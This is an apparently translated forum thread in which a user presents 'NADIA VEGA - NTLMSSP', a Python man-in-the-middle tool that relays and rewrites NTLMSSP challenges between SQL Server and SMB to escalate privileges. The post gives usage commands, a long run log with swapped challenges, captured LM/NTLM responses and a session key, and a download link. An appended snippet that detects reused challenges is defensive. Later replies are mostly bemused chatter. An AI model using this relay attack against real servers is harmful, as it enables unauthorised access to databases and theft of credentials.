
NADIA VEGA - NTLMSSP (MS SQL server remote privilege) By Shadow Angel

Discussion in 'Pemrograman Web' started by shadow angel, Jul 19, 2008.

  1. shadow angel

    shadow angel Newbie

    Joined:
    Jul 19, 2008
    Messages:
    3
    Likes Received:
    0
    NADIA VEGA - NTLMSSP

    Greetings. A brief explanation:

    This TDS/SQL tunnel tool is for connecting to a target SQL server
    as a non-privileged user. The tunnel modifies an NTLMSSP
    packet inside the TDS/SQL connection,
    documented as MITM.

    ~ Tested with:

    Windows 2000 SP4 + Python + SQL Server 2000

    ========================================

    $$$ SQL client test:

    >Nadia.py w2ks-sql2000
    [.] Koneksi ke Server w2ks-sql2000...
    [!] Menghubungkan ke server w2ks-sql2000 OK
    Traceback (most recent call last):
    File "C:\tmp\Nadia.py", line 31, in ?
    cursor.execute("create table katakuris (line varchar(42))")
    dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]CREATE TABLE permission denied in database 'master'. in EXEC

    Ouch.., PERMISSION DENIED



    >Nadia.py w2ks-sql2000-tunel
    [.] Koneksi ke Server w2ks-sql2000-tunel...
    [!] Menghubungkan ke server w2ks-sql2000-tunel OK
    Traceback (most recent call last):
    File "C:\tmp\Nadia.py", line 48, in ?
    print cursor.execute("create table katakuris (line varchar(42))")
    dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'katakuris' in the database. in EXEC

    \o/ Message: now it works!
    ========================================

    $$$ Example
    ### NADIA VEGA - NTLMSSP ###
    ### MS SQL server remote privilege ###
    ### Shadow Angel 2007 ###

    [---] Menunggu koneksi SQL Client

    [***] Mendapatkan SQL Client

    [***] mendapatkan respon balik dari Server

    [---] respon balik SQL server SMB client dengan respon balik dari
    SQL server

    [-] mendapatkan koneksiSMB dari SQl Server (DSN=w2ks-sql2000)

    [***] mendapatkan respon SQL server SMB client

    [***] autentikasi ke SQL server sebagai A d m i n i s t r a t o r

    [---] kirim respon ke SQL server

    [---] Mentunnel client...

    ========================================

    $$$ Example:

    >vega.py 192.168.60.131



    ### NADIA VEGA - NTLMSSP ###
    ### MS SQL server remote privilege ###
    ### Shadow Angel 2007 ###

    Penggunaan: vega.py tunel_local_ip sql_server_ip sql_server

    >vega.py 192.168.60.1 192.168.60.131 w2ks-sql2000


    ### NADIA VEGA - NTLMSSP ###
    ### MS SQL server remote privilege ###
    ### Shadow Angel 2007 ###

    [---] menunggu koneksi dari SQL Client
    [-] Buat Baru, TDS client 127.0.0.1
    [-] menghubungkan ke remote SQL server 192.168.60.131

    [***] mendapatkan SQL client

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    [4<-] SQL client <- TDS tunel <- SQL server

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    !! NTLMSSP: Mendapatkan Respon Balik !!
    ----------------------------------------
    [Respon Balik - 8 bytes]
    0b 62 83 ca a8 36 71 f4
    ----------------------------------------
    [4<-] SQL client <- TDS tunel <- SQL server

    [***] mendapatkan respon balik dari SQL Server
    [---] respon balik SQL Server SMB Client dengan respon balik
    SQl Server
    [-] SMBTuna, menunggu SQL server untuk koneksi ke SMB tunnel...
    [-] Mendapatkan koneksi SMB dari SQL server (DSN=w2ks-sql2000)
    [-] SMBTuna, SQL server 192.168.60.131 menghubungkan ke SMB
    [-] SMBTuna, menghubungkan ke remote SMB server 192.168.60.131

    ========================================
    [a->] SMB client -> SMB tunel
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mulai Bernegosiasi !!
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    !! NTLMSSP: Mendapatkan Respon Balik !!
    ----------------------------------------
    [respon balik - 8 bytes]
    2f 31 e1 ca 9d ab 88 db
    ----------------------------------------
    ----------------------------------------
    [respon balik SMB server - 8 bytes]
    2f 31 e1 ca 9d ab 88 db
    ----------------------------------------
    [-] SMBTuna, modifikasi respon balik SQL server :
    ----------------------------------------
    [respon balik SQL server - 8 bytes]
    0b 62 83 ca a8 36 71 f4
    ----------------------------------------
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mendapatkan autentikasi !!
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mulai Bernegosiasi !!
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    !! NTLMSSP: Mendapatkan Respon Balik !!
    ----------------------------------------
    [respon balik - 8 bytes]
    f0 7b 2e bb 18 e0 f9 82
    ----------------------------------------
    ----------------------------------------
    [respon balik SMB server - 8 bytes]
    f0 7b 2e bb 18 e0 f9 82
    ----------------------------------------
    [-] SMBTuna, modifikasi respon balik SQL Server !!
    ----------------------------------------
    [respon balik SQL server - 8 bytes]
    0b 62 83 ca a8 36 71 f4
    ----------------------------------------
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mendapatkan Autentikasi !!
    [-] SMBTuna, mendapatkan respon balik
    ----------------------------------------------------------------------------

    ** NTLMSSP:type=3
    ----------------------------------------
    [lmresponse - 24 bytes]
    2a fe 49 f5 e7 09 92 4d 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00
    ----------------------------------------
    ----------------------------------------
    [ntlmresponse - 24 bytes]
    05 e3 ce 38 88 45 c5 bb 44 6b c4 b9 ee d8 b3 06 f9 5b c1 0d
    21 43 bd 14
    ----------------------------------------
    - domain W 2 K S E R V E R
    - user n a d i a v e g a
    - host W 2 K S E R V E R
    ----------------------------------------
    [sessionKey - 16 bytes]
    11 76 b7 fc 56 11 bd bd 9f 95 a2 25 fb 9c f1 ca
    ----------------------------------------
    ----------------------------------------------------------------------------

    [***] mendapatkan respon server SMB client

    [***] autentikasi ke SQL server sebagai nadia vega

    [---] kirim respon ke SQL server

    ========================================
    [1->] SQL client -> TDS tunel
    [-] client TDS paquet: type 17 status 1 size 142/8e
    !! NTLMSSP: Mendapatkan Autentikasi !!
    [-] Baris data NTLMSSP adalah 134
    [-] Baris NTLMSSP yang baru adalah 249
    [-] Ganti kapasitas TDS ke 257/0x101
    [-] Baris Data asli -> 142
    [-] Perbaharui baris data -> 257
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    [4<-] SQL client <- TDS tunel <- SQL server

    [---] tunnel client...

    [-] TDSTuna, permintaan master tunnel...

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    [4<-] SQL client <- TDS tunel <- SQL server

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    To download it, use the address below:

    http://www.savefile.com/files/1676038

    Finally, I hope this Python program, NADIA VEGA – NTLMSSP,
    is useful for the advancement of the programming world..

    Shadow Angel is not responsible
    if this program is used for negative purposes..

    For comments or suggestions, send an e-mail to:

    h4ck3r_shadowangel@yahoo.com

    Thank you..

    Friendly regards..


    Shadow Angel
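
Added example, not part of the original post or the tool: in the log above, the SQL server's challenge `0b 62 83 ca a8 36 71 f4` is substituted for the SMB server's own challenges, so the same 8-byte value shows up on two unrelated connections. The sketch below flags that reuse from captured payloads; the flow labels, wrapper bytes and function names are assumptions made for illustration.

```python
import struct
from collections import defaultdict

NTLMSSP_SIG = b"NTLMSSP\x00"
TYPE_CHALLENGE = 2  # NTLMSSP type 2 message carries the server challenge


def extract_challenges(payload):
    """Return the 8-byte server challenge of every NTLMSSP type 2 message
    embedded anywhere in payload (the TDS or SMB framing is skipped over)."""
    found = []
    pos = payload.find(NTLMSSP_SIG)
    while pos != -1:
        hdr = payload[pos:pos + 32]
        # Layout: signature(8) type(4) target-name fields(8) flags(4) challenge(8)
        if len(hdr) == 32 and struct.unpack_from("<I", hdr, 8)[0] == TYPE_CHALLENGE:
            found.append(hdr[24:32])
        pos = payload.find(NTLMSSP_SIG, pos + 1)
    return found


def reused_challenges(records):
    """records: iterable of (flow_label, payload). A server challenge is a
    fresh random nonce per handshake, so one value on several flows is a
    strong sign that a challenge is being replayed between connections."""
    seen = defaultdict(set)
    for flow, payload in records:
        for challenge in extract_challenges(payload):
            seen[challenge.hex()].add(flow)
    return {c: sorted(flows) for c, flows in seen.items() if len(flows) > 1}


def make_type2(challenge, wrapper):
    """Build a constructed type 2 message behind a dummy transport wrapper."""
    return (wrapper + NTLMSSP_SIG + struct.pack("<I", TYPE_CHALLENGE)
            + b"\x00" * 8 + struct.pack("<I", 0x8201) + challenge + b"\x00" * 8)


# Constructed sample traffic; challenge values are the ones printed in the log.
SQL_CHALLENGE = bytes.fromhex("0b6283caa83671f4")
SAMPLE_RECORDS = [
    ("tds:client<-sql", make_type2(SQL_CHALLENGE, b"TDS-WRAPPER")),
    ("smb:tunnel<-smbserver", make_type2(bytes.fromhex("2f31e1ca9dab88db"), b"\xffSMB")),
    ("smb:sqlserver<-tunnel", make_type2(SQL_CHALLENGE, b"\xffSMB")),
    ("smb:tunnel<-smbserver", make_type2(bytes.fromhex("f07b2ebb18e0f982"), b"\xffSMB")),
]

if __name__ == "__main__":
    for challenge, flows in reused_challenges(SAMPLE_RECORDS).items():
        print("challenge", challenge, "seen on", ", ".join(flows))
```
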
     
  2. brainet

    brainet Super Hero

    Joined:
    Feb 4, 2006
    Messages:
    1,110
    Likes Received:
    17
    what is this? :confused:
     
  3. ngkong

    ngkong Administrator Staff Member Banned Permanent

    Joined:
    Dec 5, 2005
    Messages:
    2,963
    Likes Received:
    301
    whoa, what is this...
    I'll move it to the programming forum, OK boss...
     
  4. sudarsono

    sudarsono Ads.id Pro

    Joined:
    Jul 30, 2007
    Messages:
    439
    Likes Received:
    2
    Location:
    Pekanbaru
    Nadia Vega???
    wow, sounds like a celebrity's name...

    man, I don't understand it at all....:)
    my brain can't handle it..
     
  5. Bonie

    Bonie Super Hero

    Joined:
    Apr 20, 2008
    Messages:
    1,105
    Likes Received:
    23
    Location:
    BonieBarlian.com
    the server runs Windows, phew... can't stand it... is there a Linux (php or mysql) version of the tunnel? hehe
     
  6. badboys

    badboys Super Hero

    Joined:
    Aug 8, 2007
    Messages:
    1,420
    Likes Received:
    50
    Location:
    Di dalem kamar

    Do you get what the TS means, boss?? what is that anyway :hmm:

    Doesn't look like food :lol:
     
  7. raedyfor

    raedyfor Super Hero

    Joined:
    Feb 3, 2008
    Messages:
    2,061
    Likes Received:
    91
    the only part I understand is the nadia vega :lol:
     
  8. Bonie

    Bonie Super Hero

    Joined:
    Apr 20, 2008
    Messages:
    1,105
    Likes Received:
    23
    Location:
    BonieBarlian.com
    well, it matches the thread title :D

    "NADIA VEGA - NTLMSSP(MS SQL server remote privilege)"
     
  9. danzig138

    danzig138 Ads.id Fan

    Joined:
    Nov 5, 2007
    Messages:
    106
    Likes Received:
    1
    what is this, bon?
    hacking, maybe
     
  10. Bonie

    Bonie Super Hero

    Joined:
    Apr 20, 2008
    Messages:
    1,105
    Likes Received:
    23
    Location:
    BonieBarlian.com
    clear, right? :D anyway, it's at your own risk, just don't mess with your own countrymen's stuff... poor them :(
     
  11. pLeNd

    pLeNd Ads.id Pro

    Joined:
    Jun 7, 2008
    Messages:
    332
    Likes Received:
    27
    whoa, hackers have joined this forum, scary scary :gembira:

    I'm outta here... :hmm:
     